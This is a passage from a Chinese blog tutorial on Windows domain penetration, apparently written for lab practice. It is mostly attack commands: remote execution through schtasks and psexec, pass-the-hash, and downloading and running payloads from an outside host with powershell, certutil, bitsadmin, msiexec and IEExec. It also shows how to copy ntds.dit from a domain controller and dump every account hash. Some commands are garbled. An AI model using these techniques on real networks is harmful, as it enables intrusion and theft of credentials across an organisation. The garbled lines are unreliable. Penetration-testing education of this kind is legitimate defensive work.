
<p><img src="/2020/09/29/DomainPenetration/20.png" alt="image"></p>
<h5 id="c-、Schtasks计划任务执行命令"><a href="#c-、Schtasks计划任务执行命令" class="headerlink" title="c 、Schtasks计划任务执行命令"></a>c 、Schtasks计划任务执行命令</h5><p>推荐用schtasks计划任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">// 创建计划任务</span><br><span class="line">schtasks /create /tn taskName /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径  /sc ONSTART /s 域机器IP /RU system</span><br><span class="line"></span><br><span class="line">// 运行计划任务</span><br><span class="line">schtasks /run /tn taskName /s 域机器IP /U 域\域用户 /P 域用户密码</span><br><span class="line"></span><br><span class="line">// 删除计划任务</span><br><span class="line">schtasks /F /delete /tn taskName /s 域机器IP /U 域\域用户  /P  域用户密码</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/21.png" alt="image"></p>
<h5 id="d、psexec执行命令"><a href="#d、psexec执行命令" class="headerlink" title="d、psexec执行命令"></a>d、psexec执行命令</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 建立IPC连接</span><br><span class="line"></span><br><span class="line">net use \\192.168.52.2 &#x2F;u:DomainName\UserName password*</span><br><span class="line"></span><br><span class="line">psexec.exe \\192.168.52.2 -s cmd.exe -accepteula</span><br></pre></td></tr></table></figure>

<p>-accepteula     第一次运行会弹框，输入这个参数便不会弹框</p>
<p>-s     以“nt authority\system”权限运行远程进程</p>
<ul>
<li>hash传递攻击</li>
</ul>
<p>//当hash没有解出来的时候，可以使用hash传递攻击</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe -hashes :用户hash 域名&#x2F;用户名@目标IP</span><br><span class="line"></span><br><span class="line">psexec.exe -hashes:70a50724b37f6d3d03d00c24e946fde3 hack&#x2F;administrator@192.168.52.2</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/22.png" alt="image"></p>
<h5 id="e、命令行下载文件"><a href="#e、命令行下载文件" class="headerlink" title="e、命令行下载文件"></a>e、命令行下载文件</h5><p>1 - powershell(win2003、 winXP不支持)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">power -exec bypass -c (new-object SystemNet.webctient).Downloadfie(&#39;http:&#x2F;&#x2F;192.168.1.101&#x2F;test.txt&#39;,&#39;c:\test.txt&#39;)</span><br></pre></td></tr></table></figure>

<p>2 - certutil</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil.exe -urlcache -split -f http:&#x2F;&#x2F;192.168.1.1&#x2F;test.txtfile.txt</span><br></pre></td></tr></table></figure>

<p>3 - bitadmin</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin &#x2F;rawreturn &#x2F;transfer getfile http:&#x2F;&#x2F;192.168.3.1&#x2F;test.txt E:\file\test.txt</span><br><span class="line">bitsadmin &#x2F;rawreturn &#x2F;transfer getpayload http:&#x2F;&#x2F;192.168.3.1&#x2F;test.txt E:\file\test.txt</span><br></pre></td></tr></table></figure>

<p>4 - msiexec</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msiexec &#x2F;q &#x2F;i http:&#x2F;&#x2F;192.168.1.1&#x2F;test.txt</span><br></pre></td></tr></table></figure>

<p>5 - IEExec</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v2.0.50727&gt; caspol -s off</span><br><span class="line">C:\Windows\microsoft.NET\Framework\v2.0.50727&gt; IEExec.exe http:&#x2F;&#x2F;192.168.1.1&#x2F;test.exe</span><br></pre></td></tr></table></figure>

<h4 id="7、获取内网代理"><a href="#7、获取内网代理" class="headerlink" title="7、获取内网代理"></a>7、获取内网代理</h4><p>内网有些资源可能需要挂指定代理才可以访问：</p>
<ul>
<li>ie代理</li>
<li>pac代理</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 直接查询HKEY_CURRENT_USER(ie 代理)</span><br><span class="line">reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot; &#x2F;v ProxyServer</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/23.png" alt="image"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 直接查询HKEY_CURRENT_USER(pac 代理)</span><br><span class="line">reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot; &#x2F;v AutoConfigURL</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/24.png" alt="image"></p>
<h4 id="8、windows-api使用"><a href="#8、windows-api使用" class="headerlink" title="8、windows api使用"></a>8、windows api使用</h4><p>利用API 写成一些小工具。所有工具使用前提：建立IPC连接。</p>
<p>工具名称：（这些Exe的名字，也都是api的名字）</p>
<p>NetGroupGetUsers.exe：查询域里的各个组里的成员，IP必须是域控IP，域用户随意。</p>
<p>NetLocalGroupGetMembers.exe:查询目标服务器本地管理组的成员。</p>
<p>NetUserEnum.exe:查询目标服务器所有用户，包括隐藏用户。</p>
<p><img src="/2020/09/29/DomainPenetration/25.png" alt="image"></p>
<h4 id="9、导出域hash"><a href="#9、导出域hash" class="headerlink" title="9、导出域hash"></a>9、导出域hash</h4><p>Windows的密码是经过hash后存储的，本地存在hklm\sam，hklm\system注册表中</p>
<p>域里面存在域控制器的c:\windows\ntds\ntds.dit中，我们取出来解密即可</p>
<p>ntds.dit其实就是个esent数据库，微软本身就有一系列的文档化api能够操作这个数据库</p>
<p><code>https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 第一步：创建快照 获取｛｝中的ID,必须在域控服务器上操作</span><br><span class="line">ntdsutil snapshot &quot;activate instance ntds&quot; create quit quit</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 第二步：挂载快照</span><br><span class="line">ntdsutil snapshot &quot;mount &#123;8a8db83f-dad7-b61d-ef272a3a483f&#125;&quot; quit quit</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 第三步：复制ntds.dit</span><br><span class="line">copy C:\$SNAP_201910121047_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 第四步：卸载快照</span><br><span class="line">ntdsutil snapshot &quot;unmount &#123;8a8db83f-dad7-b61d-ef272a3a483f&#125;&quot; quit quit</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 第五步：删除快哉</span><br><span class="line">ntdsutil snapshot &quot;delete &#123;8a8db83f-dad7-b61d-ef272a3a483f&#125;&quot; quit quit</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 第六步：获取key</span><br><span class="line">reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 第七步：使用NTDSDumpEx获取所有域用户的Hash</span><br><span class="line">NTDSDumpEx.exe -d ntds.dit -o hash.txt -s Sys.hiv -h</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/26.png" alt="image"></p>
<p>最后成功获取当前域控中所有域账户和密码</p>
<p><img src="/2020/09/29/DomainPenetration/27.png" alt="image"></p>
<h2 id="0x04-参考资料"><a href="#0x04-参考资料" class="headerlink" title="0x04 参考资料"></a>0x04 参考资料</h2><p><a href="https://www.bilibili.com/video/BV19J411R7aS" target="_blank" rel="noopener">漏洞银行丨内网渗透之初识域渗透-ske丨咖面105期</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Ch4ce</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://yoursite.com/2020/09/29/DomainPenetration/">http://yoursite.com/2020/09/29/DomainPenetration/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://yoursite.com">Chaceshadow's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/">域渗透</a><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><a class="post-meta__tags" href="/tags/%E5%9F%9F/">域</a></div><nav id="pagination"><div class="next-post pull-right"><a href="/2020/09/28/ATC-CK-Vulnstack-1/"><span>ATK&amp;CK红队评估实战靶场（一）的搭建和模拟攻击过程全过程</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/welcome-image.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By Ch4ce</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/gh/jquery/jquery@3.2/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/algolia.js?version=1.7.0"></script><script src="/js/search/local-search.js?version=1.7.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>